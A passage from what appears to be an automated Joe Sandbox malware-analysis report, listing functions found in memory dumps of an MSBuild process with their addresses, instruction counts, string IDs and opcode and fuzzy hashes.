                        • Opcode Fuzzy Hash: d01e6b5a391949f783d9fefbf06eb4d8395d0ded519cb780f14e9e33d5b0dd21
                        • Instruction Fuzzy Hash: D5613731A043548FCB95DB7AD824BA97FF1BF89300F1840AEE851DB263DA359D45CBA1
                        Function 0673DED0 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (_kq
                        • API String ID: 0-2183774854
                        • Opcode ID: cc6905bad5838612920a74778f72f9621f01ba2a6459447ad5dd2d1d8f599510
                        • Instruction ID: 09da807d83356859c087f08180a39cc1cc6f08853a2ab744c53d3787482a16fe
                        • Opcode Fuzzy Hash: cc6905bad5838612920a74778f72f9621f01ba2a6459447ad5dd2d1d8f599510
                        • Instruction Fuzzy Hash: DE51E030B003218FCB64AF39D894A6ABBE6EF85354B14496AE505CB356DF35EC41CB91
                        Function 06760AC0 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (oq
                        • API String ID: 0-3175707579
                        • Opcode ID: b5b4fbb1a8cc477829a43eaf0a897c12edca0ffe631bd0caa0b33dd06aa69966
                        • Instruction ID: e20ae4686e1b261719bf46a8d11693cd3cb77cccf13fec490be8cdc280bc2253
                        • Opcode Fuzzy Hash: b5b4fbb1a8cc477829a43eaf0a897c12edca0ffe631bd0caa0b33dd06aa69966
                        • Instruction Fuzzy Hash: C2519F34F102198FCB44AB7A942926FBFE7EFC9310B148529E506D7385EE399D02CB56
                        Function 06766658 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (oq
                        • API String ID: 0-3175707579
                        • Opcode ID: d284ecae35e8f5cc3a333cbf34718ec4c256cdabffc1e23971c77d5201daed56
                        • Instruction ID: 8b719658177ad8cafd97d9a27cc1826eb355e62f12017a75c991986a6551ad43
                        • Opcode Fuzzy Hash: d284ecae35e8f5cc3a333cbf34718ec4c256cdabffc1e23971c77d5201daed56
                        • Instruction Fuzzy Hash: 3141B7316003148FC725EF29E45466DBBF2EFC4310B15867AE5468B366DB70ED8A8B92
                        Function 0676F6F8 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: Hoq
                        • API String ID: 0-3049094369
                        • Opcode ID: 63001eec7ba47985bfc695408b0a4f9ae1ee8220af5891c7b40dc71d7def0ce8
                        • Instruction ID: bf69f99f805e909f52b46df34e68991ec84a5b31ac0b02b628d0b5a5fb23ee92
                        • Opcode Fuzzy Hash: 63001eec7ba47985bfc695408b0a4f9ae1ee8220af5891c7b40dc71d7def0ce8
                        • Instruction Fuzzy Hash: E941B435B002169FCB15DF7AE8549AE7BB6EFC9210B14846AE919C7365DB34DC01CBA0
                        Function 06735BDF Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'kq
                        • API String ID: 0-3255046985
                        • Opcode ID: b00a0f55b8436cdf1b9134417dd22e695c0bcf1172963f2a73572a696b473036
                        • Instruction ID: eefa512478f51b737763ce1dde3e6249e58d6317743fbd05144cfd6a758c731c
                        • Opcode Fuzzy Hash: b00a0f55b8436cdf1b9134417dd22e695c0bcf1172963f2a73572a696b473036
                        • Instruction Fuzzy Hash: 5E21C3313013519FD7559B3CD940AAABBA2FFC5310B108A3AE1568F6A5CB70E84A8790
                        Function 06763750 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: (_kq
                        • API String ID: 0-2183774854
                        • Opcode ID: f8819c75ff2ca81eca80ec91e9782a439656d0185382c508dc7c4a1f8567e56b
                        • Instruction ID: 3a8bb31dffe32c9173dffd4d5a4272cc12edbeeba94099dcebc2190fe31e2f36
                        • Opcode Fuzzy Hash: f8819c75ff2ca81eca80ec91e9782a439656d0185382c508dc7c4a1f8567e56b
                        • Instruction Fuzzy Hash: 7F11AD3A3101188FCB456FB8E55899D7BE6EB883217044465F20ACB761CE36DC219B85
                        Function 01011B8E Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: c
                        • API String ID: 0-1244939750
                        • Opcode ID: 50398eef82b86f0cd4f619ea2471bcc764c78b642cd906021ee412e57ffbe0d4
                        • Instruction ID: 30ccd74c3390af301467aa1e8720f6c10a3b75c9028d7d4fbef627164bdccec3
                        • Opcode Fuzzy Hash: 50398eef82b86f0cd4f619ea2471bcc764c78b642cd906021ee412e57ffbe0d4
                        • Instruction Fuzzy Hash: 8C01F4367003155FD705AB68A8807AE77A2FFC8224F268819D6056B389EB78AC4547D0
                        Function 01011B97 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: c
                        • API String ID: 0-1244939750
                        • Opcode ID: 739ff68ded0c7e724e2a87b67e84410d0f11cc2f0879b433a0427731cac5e215
                        • Instruction ID: 2ee5001a9e69d5688acbdb1e7a85ddae2fb2a1ebc5bfff71adea502e7a2c771b
                        • Opcode Fuzzy Hash: 739ff68ded0c7e724e2a87b67e84410d0f11cc2f0879b433a0427731cac5e215
                        • Instruction Fuzzy Hash: E9F028367003155FC705AA68A88079E77A2FFC8230F168828D9056B349EF74AC0147D0
                        Function 010188F0 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'kq
                        • API String ID: 0-3255046985
                        • Opcode ID: 6d7ec508ddb740547554af81035955cf83f55ce743307153aaecd80e35fd7d3a
                        • Instruction ID: 1c6df46726d7b929899edf2884df4958cf4ea1ba2f5bb8389b2bfd0b43812a43
                        • Opcode Fuzzy Hash: 6d7ec508ddb740547554af81035955cf83f55ce743307153aaecd80e35fd7d3a
                        • Instruction Fuzzy Hash: F6014B70A11209DFCB08EFB8E94659C7FF1FB45202F2056A9E405A7365DF345A49CB54
                        Function 0676F628 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: LRkq
                        • API String ID: 0-1052062081
                        • Opcode ID: b8c4bd9b07600e097a8e93b32d0de36eee08799d841210538951c291c70ee750
                        • Instruction ID: 3e6114b2bf7ab5286a4a7541fcd699d6f8b5badc8e36998523051805e7a77ddb
                        • Opcode Fuzzy Hash: b8c4bd9b07600e097a8e93b32d0de36eee08799d841210538951c291c70ee750
                        • Instruction Fuzzy Hash: C8F0A7757001146FC718AA2AE855E6BBBABFFC9720B10C16EF60ACB3A0DD759D04C794
                        Function 01018900 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'kq
                        • API String ID: 0-3255046985
                        • Opcode ID: 54dadafac5b17528a9d220bf43917464c43bec8bb454476d7b0cf9fa3ff811fc
                        • Instruction ID: 99be28c0ad82f249f8f8bb299f1dc89b603fb16cfb6c22f22263bc2b4f281cea
                        • Opcode Fuzzy Hash: 54dadafac5b17528a9d220bf43917464c43bec8bb454476d7b0cf9fa3ff811fc
                        • Instruction Fuzzy Hash: CEF01970A11209EFCB08EFB9E94545CBFB1FB44202B5015A9E405A7364DF346A48CB95
                        Function 0676A47F Relevance: .4, Instructions: 414COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e874d8fc3fa68fed97222eb001a5b97f06a4caea70fe670ce2c57aadfe382961
                        • Instruction ID: c168ed7f9000ad51f99c729f3eb80871b6560e3cf406ea6fc97c50580f7a52c2
                        • Opcode Fuzzy Hash: e874d8fc3fa68fed97222eb001a5b97f06a4caea70fe670ce2c57aadfe382961
                        • Instruction Fuzzy Hash: 4E029D70A007458FDB55DF29C844BA9BBF2BF89304F158698E809AB352DB35ED85CF80
                        Function 0673EB58 Relevance: .4, Instructions: 405COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6116d8f87de9ab37cf20b7d4f39897345c3d3ed79590e7125cc18b52ddd1b2e8
                        • Instruction ID: 7a8963b32039d3fd95aa2332762c87e57f210a621f841a591d0df221516d7176
                        • Opcode Fuzzy Hash: 6116d8f87de9ab37cf20b7d4f39897345c3d3ed79590e7125cc18b52ddd1b2e8
                        • Instruction Fuzzy Hash: 45F17A34A002199FDB54DFA9E454AADBBF2FF88300F148569E806EB396DB35EC41CB51
                        Function 06769840 Relevance: .4, Instructions: 381COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 910f689c490c43d226c38779b40b92d8257aa0af0b9ae356a8a6c50582ff3e74
                        • Instruction ID: e1ad63af2478e25446ad9c466b3e269838a3298db344b4e67e29938f753a26a2
                        • Opcode Fuzzy Hash: 910f689c490c43d226c38779b40b92d8257aa0af0b9ae356a8a6c50582ff3e74
                        • Instruction Fuzzy Hash: 86025035A10719CFDB14DF39C954A69BBB1FF49310F118699E949AB361EB30E981CF80
                        Function 067657D0 Relevance: .4, Instructions: 368COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f7ce76ffe141042b1ae3589c2e224fddba3a32dbdb5d83ea00cee811bc350973
                        • Instruction ID: 43bebaee5668c12d97cf8339ce215037e7d5e54d46990afe346c1330a50f5de3
                        • Opcode Fuzzy Hash: f7ce76ffe141042b1ae3589c2e224fddba3a32dbdb5d83ea00cee811bc350973
                        • Instruction Fuzzy Hash: 7AD1AC34F002198FDB54DFBAD854AAD7BF2AF88310F148569E802EB395EE34DD458B90
                        Function 06764838 Relevance: .3, Instructions: 344COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 99cfc3bb76c18029af348771292e6ad63117d9b9ecc9ad5ae733f499e3149e1d
                        • Instruction ID: af8a8dca5d6fd93ba318c8b6079b5311f4bb14850264f6b3aa3e2002f279af55
                        • Opcode Fuzzy Hash: 99cfc3bb76c18029af348771292e6ad63117d9b9ecc9ad5ae733f499e3149e1d
                        • Instruction Fuzzy Hash: 7BD19834B002059FCB55DF69C894A6EBBF6EF89300F148569E906DB3A5DB35EC06CB90
                        Function 06731B97 Relevance: .3, Instructions: 324COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d1193706fc47c2ae9bcebaf1584e8bd462e1bad7b12bec9596230622ced18dcc
                        • Instruction ID: d722fa095dc94e49dd5fb68de6a621c33e33c69868ebb695611731df814ab422
                        • Opcode Fuzzy Hash: d1193706fc47c2ae9bcebaf1584e8bd462e1bad7b12bec9596230622ced18dcc
                        • Instruction Fuzzy Hash: 28D17A34B103188FDB58AF75D45866EBBF2BF85300F548569E8469B3A6DF35E886CB00
                        Function 06766A88 Relevance: .3, Instructions: 303COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f844c8395a249eb9544f88bfed9eb9d6ec05c6e742c03c9f6260cf7c1326361d
                        • Instruction ID: 45f7ccb8a67d8c729dcfbe766329b7b2a21f7a0a2c42a39f81b9397e9ae2859f
                        • Opcode Fuzzy Hash: f844c8395a249eb9544f88bfed9eb9d6ec05c6e742c03c9f6260cf7c1326361d
                        • Instruction Fuzzy Hash: F4C1BC7576A511CFEBC8EE2BE4D886577B5E750300B00AD14FE268B758C772ED408BA2
                        Function 06765DD8 Relevance: .3, Instructions: 299COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b318d400d1e1b656d45a684d6a2fb02de14e661e45c2abe75d577600b83ca2a8
                        • Instruction ID: 8154212a6369f52e0d7e1bec921ac54dfcadd362799e63da3d9b3f9f95d5a396
                        • Opcode Fuzzy Hash: b318d400d1e1b656d45a684d6a2fb02de14e661e45c2abe75d577600b83ca2a8
                        • Instruction Fuzzy Hash: 20B17D31B10215DFDB54DF7AD8449AEB7F2BF88204B158528E805EB356EB31EC46CB91
                        Function 06732293 Relevance: .3, Instructions: 279COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 698d1d6a7067dd0bd2d6fa0da99db6326854eb0b2f9d733476e94d3084969de3
                        • Instruction ID: 6c17270190b5f87006719a38bbe18f28e468aa8e247f28f9d8cebe2ccf84c0b2
                        • Opcode Fuzzy Hash: 698d1d6a7067dd0bd2d6fa0da99db6326854eb0b2f9d733476e94d3084969de3
                        • Instruction Fuzzy Hash: B7D18A70D1032ACFDB54DF68C844B99FBB1BF85304F148699D449AB252DB70EA85CF90
                        Function 01014CDC Relevance: .3, Instructions: 262COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3eddb644cdd6df54dbf62e2a4d2faff42719d460b0464b0921536356852e5c82
                        • Instruction ID: 9b4ab9a7e2e8c211397137ec69c4a9ababc51a3afc7d3dd302b44fb089cac1de
                        • Opcode Fuzzy Hash: 3eddb644cdd6df54dbf62e2a4d2faff42719d460b0464b0921536356852e5c82
                        • Instruction Fuzzy Hash: 02B15C71E00209CFDF51CFA8C9857DDBBF1AF88314F148569E454EB2A8EB799885CB81
                        Function 06730F88 Relevance: .2, Instructions: 243COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a78bd37fd09e3396f10f5b385277d4840f72aa1adeefe2f21afa3d8959a4df79
                        • Instruction ID: 1dcd2745c22d17898d347bbc6aa2d6b358ba5c14f937a7447aeb7173db23fc7b
                        • Opcode Fuzzy Hash: a78bd37fd09e3396f10f5b385277d4840f72aa1adeefe2f21afa3d8959a4df79
                        • Instruction Fuzzy Hash: A9B14C30E1022ACBDB54EF64DC54BADBBB2BF85300F508699D949A7251DF30AE85CF90
                        Function 06763D00 Relevance: .2, Instructions: 241COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7214f842656bab39bd4580cb91d852335c4f07e580b112bf7379a517bed95bb5
                        • Instruction ID: 198b6e1ba82438c36dbb24e25783c29a24bb248b3900575e9eaa6974df52dd3d
                        • Opcode Fuzzy Hash: 7214f842656bab39bd4580cb91d852335c4f07e580b112bf7379a517bed95bb5
                        • Instruction Fuzzy Hash: 21A1E275A002499FCB45DF69D888A99BBF2AF89320F158599F901DB362DB30EC85CB50
                        Function 0101F882 Relevance: .2, Instructions: 239COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0a6dee6a5286d51397d11feb7735d30a22b98348ab3331ac84a66f2215918242
                        • Instruction ID: 85971ee9cb66464d7adb97b3d23058a0b6ab4a990024389f0c47585c688d8353
                        • Opcode Fuzzy Hash: 0a6dee6a5286d51397d11feb7735d30a22b98348ab3331ac84a66f2215918242
                        • Instruction Fuzzy Hash: ECC15339A02348DFCB79AF72CA1866DBB72FB49345B20456ADB0256724CB778C45EF01
                        Function 06762E10 Relevance: .2, Instructions: 239COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b1dd55dede743db761055351e56e21a545425630b3ee555e341acaa0a2ece2ce
                        • Instruction ID: ed0d128e5d7d89b78ac854c1184446af6fbc06aa2ac6c4425a253d885d0a3316
                        • Opcode Fuzzy Hash: b1dd55dede743db761055351e56e21a545425630b3ee555e341acaa0a2ece2ce
                        • Instruction Fuzzy Hash: 3B81D171A002099FCB80EF7AD8509AF7FF6AF89310B108569F919DB356DA34D905CBA1
                        Function 066FE420 Relevance: .2, Instructions: 239COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07321607a3db5d7e098f6d96ea3021e2c33f9ee2f4c3466a42953f4e9438c05c
                        • Instruction ID: bf35f28f872fc76b481fed219562434bd75b463bf68d807896f61c6a2cf288b5
                        • Opcode Fuzzy Hash: 07321607a3db5d7e098f6d96ea3021e2c33f9ee2f4c3466a42953f4e9438c05c
                        • Instruction Fuzzy Hash: A5811E30B143049FCB54AB79C814A6E7FE6AF85310F144879E605DB3A5DE36DD05CBA1
                        Function 066F0628 Relevance: .2, Instructions: 229COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c19138126a8db3a8b359c66471825b22caa3553f23e478c8fb63fb0b27135f1
                        • Instruction ID: 57e28be767906cd66fb58c087b3bb742e304a7a7293e348f9b07596a91b67bd3
                        • Opcode Fuzzy Hash: 2c19138126a8db3a8b359c66471825b22caa3553f23e478c8fb63fb0b27135f1
                        • Instruction Fuzzy Hash: 72915C74B002159FCB44DF69D894AAEBBF2FF89310B148569E909DB366DB30EC01CB90
                        Function 06764188 Relevance: .2, Instructions: 224COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c00aeaf05805bc42264fd17857ea5bf30cebc4219d6cddcfa231d2dca77e077
                        • Instruction ID: ee3d67e4e1439af75a13aafd4ee9c80eb8bee162d0e18b6130308dfb330eb8e2
                        • Opcode Fuzzy Hash: 4c00aeaf05805bc42264fd17857ea5bf30cebc4219d6cddcfa231d2dca77e077
                        • Instruction Fuzzy Hash: 8E710F30B043489FCB15DFBA981566E7FF2EF82300F2481A9E905DB386DA359D41CB92
                        Function 01010677 Relevance: .2, Instructions: 220COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83f406dc4d7bb680d8b302e1209d678b109de31ee389357ffd96fb0186ad03c1
                        • Instruction ID: 713ab8d24f2e0c39faa4b65e560767db9fefafefa01469e8b11a29e22d9bfeb6
                        • Opcode Fuzzy Hash: 83f406dc4d7bb680d8b302e1209d678b109de31ee389357ffd96fb0186ad03c1
                        • Instruction Fuzzy Hash: 4671ED6281F3D11FDB07A73858A41963F34AE5316474E41D7E4C0CF1ABE928488EC7B2
                        Function 06761B00 Relevance: .2, Instructions: 219COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b5e24a39f92999545bf9aadc0d8bcbae7245f06d28a6b142012879c0866269c2
                        • Instruction ID: 2281c6bb5aacd4fdd5bb7a3814553e0fd032a2f3ba90bfc1e444ba4acc2e23ca
                        • Opcode Fuzzy Hash: b5e24a39f92999545bf9aadc0d8bcbae7245f06d28a6b142012879c0866269c2
                        • Instruction Fuzzy Hash: 64714730B053848FCB45DB7E986463E7FA2EF86300B5485AAE845CB387DA34DD45C7A2
                        Function 0673B319 Relevance: .2, Instructions: 215COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c640bcd33a6e74f30729aad90de9aee527f6a4be5df91613c0c9dbc82d493d0
                        • Instruction ID: a5d1d67af961a1d36a608b2eba186712264b753cc21fd013f103c3e5b5b896a0
                        • Opcode Fuzzy Hash: 2c640bcd33a6e74f30729aad90de9aee527f6a4be5df91613c0c9dbc82d493d0
                        • Instruction Fuzzy Hash: BA910B35A102198FCB44DF68C894AAEBBB6FF88300F148559E506EB365DB70ED45CF90
                        Function 0676BB28 Relevance: .2, Instructions: 198COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1ce9eaf3263093bfc7df8c5ca5498cb5f1d54a0abdb03248ad57914d936dab90
                        • Instruction ID: 86caa27cc72cfbf3c85ef8bc50780fbeead6a305be7f2b981adb5577bec63278
                        • Opcode Fuzzy Hash: 1ce9eaf3263093bfc7df8c5ca5498cb5f1d54a0abdb03248ad57914d936dab90
                        • Instruction Fuzzy Hash: D671E730A10319DFCB44DB75D845BAEBBB5FF86300F108669F545AB291EF70A984CB51
                        Function 06730F7B Relevance: .2, Instructions: 183COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e47fcb64a0715df77c362fb3410759d385680be3a7ee4f5d57ed1eabe68991f4
                        • Instruction ID: f26e0e524adf3eb00d3545dc765f88900b3c254a035ec400ffe1e25076e0e04d
                        • Opcode Fuzzy Hash: e47fcb64a0715df77c362fb3410759d385680be3a7ee4f5d57ed1eabe68991f4
                        • Instruction Fuzzy Hash: 9B815B30E1166ACFEB64DF64CC54BADBB72BF45300F508699E84967251DB30AE85CF90
                        Function 0673FD33 Relevance: .2, Instructions: 183COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
